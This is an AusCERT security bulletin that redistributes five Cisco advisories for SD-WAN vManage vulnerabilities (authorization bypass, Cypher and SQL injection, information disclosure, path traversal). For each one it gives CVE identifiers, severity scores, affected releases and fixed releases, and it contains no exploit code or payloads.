iQIVAwUBYAkWpONLKJtyKPYoAQj2BRAAm2FCLHUFvWdEsJe7Mif7TEcVME6EBnBG
rFu/eSssvFHtxI37+ND5s1GXLIJsDiB5kELXITJhbIGV4oJNs4Is67MmKJSOIubZ
XIF70TbcmlJJxMTbop8Wg3Z87GiQiPcz/w027/tR1tA/QDVQz1nL/WcjGXRbLmau
5ATXDfS4fpJF5LI/db9upNcqMp/yhVrEel3aWCm4oCSt5AoDECuHSxJ7b1Loq749
6IbYkWJHB0Ry8s5ZiPfzq++aNrW3EsLxru5nxzdQCpN8/8T9CC8noOMK+nq0H7t8
4MOGrqD6honule1KrE26mofrLb9zjz9dugTqcVZz4Wm+66bigHYdOqsb3sBb8s4P
o9oOhONcgJr0Qy7Oa2kFQPuXR9zJCadXGEQu4Azerr/zUiDRTwBrtRoOF7/gHUoI
ZvbeD8Rbi867EUYAbmLy2zfj9ZwxOdOYmR10zIH4Dlgxor5K7enCiovSjFnHR0Ez
18v6Ayc1mzAYSsYCCQs/HAtYm4m98XeUfATArRaK2utWHQaXI7P94InCipNHZop6
6LS/ajAW0AEE7F76fK4uEFX2Yj/yeeHHZZLXBNJe7855kwOtD7bwGZ3rrGwfR/l7
rx5wnoOv3N6NKnhDhgqQBdhejV5JhYHxEIDP/SkYf3lt9I5dWReC1pH4s59C6MRO
S/o/N5AFs58=
=tCkb
-----END PGP SIGNATURE-----
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2021.0244
Cisco SD-WAN vManage multiple vulnerabilities
21 January 2021
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Cisco SD-WAN vManage Software
Publisher: Cisco Systems
Operating System: Cisco
Impact/Access: Modify Arbitrary Files -- Remote/Unauthenticated
Create Arbitrary Files -- Existing Account
Access Confidential Data -- Remote/Unauthenticated
Unauthorised Access -- Existing Account
Resolution: Patch/Upgrade
CVE Names: CVE-2021-1349 CVE-2021-1305 CVE-2021-1304
CVE-2021-1302 CVE-2021-1259 CVE-2021-1235
CVE-2021-1225
Original Bulletin:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-abyp-TnGFHrS
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-72EhnUc
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vinfdis-MC8L58dj
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-sqlinjm-xV8dsjq5
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-pathtrav-Z5mCVsjf
Comment: This bulletin contains five (5) Cisco Systems security advisories.
- --------------------------BEGIN INCLUDED TEXT--------------------
Cisco SD-WAN vManage Authorization Bypass Vulnerabilities
Priority: High
Advisory ID: cisco-sa-sdwan-abyp-TnGFHrS
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvi59734 CSCvs11283 CSCvu28377
CVE Names: CVE-2021-1302 CVE-2021-1304 CVE-2021-1305
CWEs: CWE-20 CWE-284
Summary
o Multiple vulnerabilities in the web-based management interface of Cisco
SD-WAN vManage Software could allow an authenticated, remote attacker to
bypass authorization and modify the configuration of an affected system,
gain access to sensitive information, and view information that they are
not authorized to access.
For more information about these vulnerabilities, see the Details section
of this advisory.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-abyp-TnGFHrS
Affected Products
o Vulnerable Products
These vulnerabilities affect Cisco devices if they are running a vulnerable
release of Cisco SD-WAN vManage Software.
For a device to be affected by CVE-2021-1302, the Multi-Tenant feature must
be enabled.
For information about which Cisco software releases are vulnerable, see the
Fixed Software section of this advisory.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by these vulnerabilities.
Cisco has confirmed that these vulnerabilities do not affect the following
products:
IOS XE SD-WAN Software
SD-WAN vBond Orchestrator Software
SD-WAN vEdge Cloud Routers
SD-WAN vEdge Routers
SD-WAN vSmart Controller Software
Details
o The vulnerabilities are not dependent on one another; exploitation of one
of the vulnerabilities is not required to exploit another vulnerability. In
addition, a software release that is affected by one of the vulnerabilities
may not be affected by the other vulnerabilities.
Details about the vulnerabilities are as follows:
CVE-2021-1302: Cisco SD-WAN vManage Authorization Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco SD-WAN
vManage Software could allow an authenticated, remote attacker to bypass
authorization and connect to other vManage tenants that they are not
authorized to connect to.
The vulnerability is due to insufficient authorization checks. An attacker
could exploit this vulnerability by sending crafted HTTP requests to the
web-based management interface of an affected system. A successful exploit
could allow the attacker to bypass authorization and connect to other
vManage tenants that they are not authorized to connect to.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvu28377
CVE ID: CVE-2021-1302
Security Impact Rating (SIR): High
CVSS Base Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE-2021-1304: Cisco SD-WAN vManage Authorization Bypass Vulnerability
A vulnerability in the web-based management interface SSH console of Cisco
SD-WAN vManage Software could allow an authenticated, remote attacker to
access sensitive information that they are not normally authorized to
access.
The vulnerability is due to insufficient authorization checks. An attacker
could exploit this vulnerability by logging in to the web-based management
interface and using the SSH console feature. A successful exploit could
allow the attacker to access sensitive information, which would allow them
to carry out further attacks.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvs11283
CVE ID: CVE-2021-1304
Security Impact Rating (SIR): Medium
CVSS Base Score: 4.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVE-2021-1305: Cisco SD-WAN vManage Authorization Bypass Vulnerability
A vulnerability in the web-based management interface of Cisco SD-WAN
vManage Software could allow an authenticated, remote attacker to access
information such as logs, configurations, and device information that they
are not authorized to view.
The vulnerability is due to insufficient authorization checks of user
account privileges. An attacker could exploit this vulnerability by logging
in to the web-based management interface with a low-privileged user
account. A successful exploit could allow the attacker to access sensitive
information that they are not authorized to view.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
Bug ID(s): CSCvi59734
CVE ID: CVE-2021-1305
Security Impact Rating (SIR): Medium
CVSS Base Score: 4.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o Cisco has released free software updates that address the vulnerabilities
described in this advisory. Customers may only install and expect support
for software versions and feature sets for which they have purchased a
license. By installing, downloading, accessing, or otherwise using such
software upgrades, customers agree to follow the terms of the Cisco
software license:
https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
Additionally, customers may only download software for which they have a
valid license, procured from Cisco directly, or through a Cisco authorized
reseller or partner. In most cases this will be a maintenance upgrade to
software that was previously purchased. Free security software updates do
not entitle customers to a new software license, additional software
feature sets, or major revision upgrades.
When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Customers Without Service Contracts
Customers who purchase directly from Cisco but do not hold a Cisco service
contract and customers who make purchases through third-party vendors but
are unsuccessful in obtaining fixed software through their point of sale
should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c
/en/us/support/web/tsd-cisco-worldwide-contacts.html
Customers should have the product serial number available and be prepared
to provide the URL of this advisory as evidence of entitlement to a free
upgrade.
Fixed Releases
Customers are advised to upgrade to an appropriate fixed software release
as indicated in the following table(s). To ensure a complete upgrade
solution, consider that this advisory is part of a collection that includes
the following advisories:
cisco-sa-sdwan-abyp-TnGFHrS : Cisco SD-WAN vManage Authorization Bypass
Vulnerabilities
cisco-sa-sdwan-bufovulns-B5NrSHbj : Cisco SD-WAN Buffer Overflow
Vulnerabilities
cisco-sa-sdwan-cmdinjm-9QMSmgcn : Cisco SD-WAN Command Injection
Vulnerabilities
cisco-sa-sdwan-dosmulti-48jJuEUP : Cisco SD-WAN Denial of Service
Vulnerabilities
Cisco First Fixed Release First Fixed Release for All
SD-WAN for These Vulnerabilities Described in the
Release Vulnerabilities Collection of Advisories
Earlier Migrate to a fixed Migrate to a fixed release.
than 18.3 release.
18.3 Migrate to a fixed Migrate to a fixed release.
release.
18.4 Migrate to a fixed Migrate to a fixed release.
release.
19.2 Migrate to a fixed Migrate to a fixed release.
release.
19.3 Migrate to a fixed Migrate to a fixed release.
release.
20.1 Migrate to a fixed Migrate to a fixed release.
release.
20.3 20.3.2 20.3.2
20.4 20.4.1 20.4.1
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o These vulnerabilities were found during the resolution of a Cisco TAC
support case.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-abyp-TnGFHrS
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco SD-WAN vManage Cypher Query Language Injection Vulnerability
Priority: Medium
Advisory ID: cisco-sa-vmanage-cql-inject-72EhnUc
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvv42576 CSCvw08529
CVE Names: CVE-2021-1349
CWEs: CWE-943
Summary
o A vulnerability in the web-based management interface of Cisco SD-WAN
vManage Software could allow an authenticated, remote attacker to conduct
Cypher query language injection attacks on an affected system.
The vulnerability is due to insufficient input validation by the web-based
management interface. An attacker could exploit this vulnerability by
sending crafted HTTP requests to the interface of an affected system. A
successful exploit could allow the attacker to obtain sensitive
information.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-72EhnUc
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco SD-WAN
vManage Software releases earlier than Release 20.3.2.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco SD-WAN vManage Software releases 20.3.2
and later contained the fix for this vulnerability.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o Cisco would like to thank the following people for independently reporting
this vulnerability:
Jakub Olszak and Stefan Zaryn
Pawel Haldrzynski of ISEC Partners
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-72EhnUc
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco SD-WAN vManage Information Disclosure Vulnerability
Priority: Medium
Advisory ID: cisco-sa-sdwan-vinfdis-MC8L58dj
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvs11276
CVE Names: CVE-2021-1235
CWEs: CWE-497
CVSS Score:
5.5 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X
Summary
o A vulnerability in the CLI of Cisco SD-WAN vManage Software could allow an
authenticated, local attacker to read sensitive database files on an
affected system.
The vulnerability is due to insufficient user authorization. An attacker
could exploit this vulnerability by accessing the vshell of an affected
system. A successful exploit could allow the attacker to read database
files from the filesystem of the underlying operating system.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vinfdis-MC8L58dj
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco SD-WAN
vManage releases earlier than Release 19.2.3.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco SD-WAN vManage releases 19.2.3, 20.1.1,
20.3.1, 20.4.1, and later contained the fix for this vulnerability.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found during the resolution of a Cisco TAC support
case.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vinfdis-MC8L58dj
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco SD-WAN vManage SQL Injection Vulnerabilities
Priority: Medium
Advisory ID: cisco-sa-vman-sqlinjm-xV8dsjq5
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvi59726 CSCvk28609 CSCvk28656 CSCvk28667 CSCvs99259
CVE Names: CVE-2021-1225
CWEs: CWE-89
CVSS Score:
6.5 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:X/RL:X/RC:X
Summary
o Multiple vulnerabilities in the web-based management interface of Cisco
SD-WAN vManage Software could allow an unauthenticated, remote attacker to
conduct SQL injection attacks on an affected system.
These vulnerabilities exist because the web-based management interface
improperly validates values in SQL queries. An attacker could exploit these
vulnerabilities by authenticating to the application and sending malicious
SQL queries to an affected system. A successful exploit could allow the
attacker to modify values on or return values from the underlying database
or the operating system.
Cisco has released software updates that address these vulnerabilities.
There are no workarounds that address these vulnerabilities.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-sqlinjm-xV8dsjq5
Affected Products
o Vulnerable Products
At the time of publication, these vulnerabilities affected Cisco SD-WAN
vManage Software releases earlier than Release 19.2.3.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by these vulnerabilities.
Workarounds
o There are no workarounds that address these vulnerabilities.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco SD-WAN vManage releases 19.2.3 and later
contained the fix for these vulnerabilities.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerabilities that are
described in this advisory.
Source
o These vulnerabilities were found during internal security testing.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-sqlinjm-xV8dsjq5
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------------------------------------------------------------
Cisco SD-WAN vManage Software Path Traversal Vulnerability
Priority: Medium
Advisory ID: cisco-sa-vman-pathtrav-Z5mCVsjf
First Published: 2021 January 20 16:00 GMT
Version 1.0: Final
Workarounds: No workarounds available
Cisco Bug IDs: CSCvi59632 CSCvk28549
CVE Names: CVE-2021-1259
CWEs: CWE-22
CVSS Score:
5.3 AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N/E:X/RL:X/RC:X
Summary
o A vulnerability in the web-based management interface of Cisco SD-WAN
vManage Software could allow an authenticated, remote attacker to conduct
path traversal attacks and obtain write access to sensitive files on an
affected system.
The vulnerability is due to insufficient validation of HTTP requests. An
attacker could exploit this vulnerability by sending a crafted HTTP request
that contains directory traversal character sequences to an affected
system. A successful exploit could allow the attacker to write arbitrary
files on the affected system.
Cisco has released software updates that address this vulnerability. There
are no workarounds that address this vulnerability.
This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-pathtrav-Z5mCVsjf
Affected Products
o Vulnerable Products
At the time of publication, this vulnerability affected Cisco SD-WAN
vManage Software releases earlier than Release 18.2.0.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Products Confirmed Not Vulnerable
Only products listed in the Vulnerable Products section of this advisory
are known to be affected by this vulnerability.
Workarounds
o There are no workarounds that address this vulnerability.
Fixed Software
o When considering software upgrades , customers are advised to regularly
consult the advisories for Cisco products, which are available from the
Cisco Security Advisories page , to determine exposure and a complete
upgrade solution.
In all cases, customers should ensure that the devices to be upgraded
contain sufficient memory and confirm that current hardware and software
configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco
Technical Assistance Center (TAC) or their contracted maintenance
providers.
Fixed Releases
At the time of publication, Cisco SD-WAN vManage Software releases 18.2.0
and later contained the fix for this vulnerability.
See the Details section in the bug ID(s) at the top of this advisory for
the most complete and current information.
Exploitation and Public Announcements
o The Cisco Product Security Incident Response Team (PSIRT) is not aware of
any public announcements or malicious use of the vulnerability that is
described in this advisory.
Source
o This vulnerability was found during the resolution of a Cisco TAC support
case.
Cisco Security Vulnerability Policy
o To learn about Cisco security vulnerability disclosure policies and
publications, see the Security Vulnerability Policy . This document also
contains instructions for obtaining fixed software and receiving security
vulnerability information from Cisco.
URL
o https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-pathtrav-Z5mCVsjf
Revision History
o +----------+---------------------------+----------+--------+--------------+
| Version | Description | Section | Status | Date |
+----------+---------------------------+----------+--------+--------------+
| 1.0 | Initial public release. | - | Final | 2021-JAN-20 |
+----------+---------------------------+----------+--------+--------------+
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBYAkQqONLKJtyKPYoAQh71w//ZO2oStoj8NxqbKsuFbrli2IS1+0gt+Ic
jaZuwn9YpMO3LZtTPFzYvM9lK5Ui3xZNJqmVb7Culy0T+yS57N7wTJee/CRfxcw9
8KV0ilkfAZISNig/ihYQtPgUbH1YZLhXuMUPV6SJIdvRGSg79s7b0PHtJFgDOKxv
FwA/DrOiPIRBBe80USulj6Gfa211+uQ1QqZgS1AKsaVfqYa0k0WuPYkQTRwPgMHr
UvfygLzliGOd/8145PZP3EHR528nyJFCcWGjRM6pi0NhxAzhlic1HN0SkpTC5AvI
ZN6gBrzZ/fjgivSP/L+6pHQDqoYizxNRnivd6ZkaKflQF3MMKEnDEcxYr89l35YH
35ZZSNkqDkbHE+pk4f6PYQR8ioywrwbEcwz9cxF6g+HjjFZkz+XZptU4h4pRv4O0
qjw3lMUgrC7AXRP3Lu/CGY0TfpAT1SPy6cE6//eg2aFKJrQ+bF3hrKx78kFuFERD
o1aRLY6Hffsa+V15OxWQzuOrr5RW5CoKqSjTzBIwrw79WVKQa9GOrJI7wu/Kfm37
74eYzD0zQGiPjs+XiNc0Yj0c+NF8KA0MHvaSGl+vKsLSvy9AV7feGC5R3W99GGta
kSeZ9BE68aP9kqWEA0+Ff6IRZiBmD1I3Je1Eog1ZblHKT+IyWiTQklyzqRGMQZQq
gufnx62RlwA=
=frXg
-----END PGP SIGNATURE-----